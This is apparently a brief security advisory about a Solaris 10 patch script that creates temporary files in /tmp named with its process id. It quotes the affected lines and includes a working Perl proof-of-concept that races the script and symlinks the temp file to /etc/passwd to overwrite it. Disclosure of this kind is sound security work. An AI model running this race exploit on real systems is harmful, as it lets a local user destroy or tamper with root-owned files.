Larry W. Cashdollar

temp file creation using process id in solaris 10 patch cluster for sparc:

patches/137097-01/SUNWcsr/reloc/lib/svc/method/inetd-upgrade

lines :

72 inetdconf_entries_file=/tmp/iconf_entries.$$ 73
74 # Create sed script that prints out inetd.conf src line from inetconv generated 75 # manifest.
76 cat <<EOF > /tmp/inetd-upgrade.$$.sed 77 /propval name='source_line'/{
78 n
79 s/'//g
80 p
81 }
82 /from the inetd.conf(4) format line/{ 83 n
84 p
85 }
86 EOF

if 137097-01 is applied and changes need to be made to the inetd.conf file a malicious user can over write the contents of a root owned file with a simple script:

#!/usr/bin/perl
$clobber = "/etc/passwd";
while(1) {
open ps,"ps -ef | grep -v grep |grep -v PID |";

while(<ps>) {
@args = split " ", $_;

if (/inetd-upgrade/) {

        print "Symlinking iconf_entries.$args[1] to  $clobber\n";
        symlink($clobber,"/tmp/iconf_entries.$args[1]");
        exit(1);

}
}

}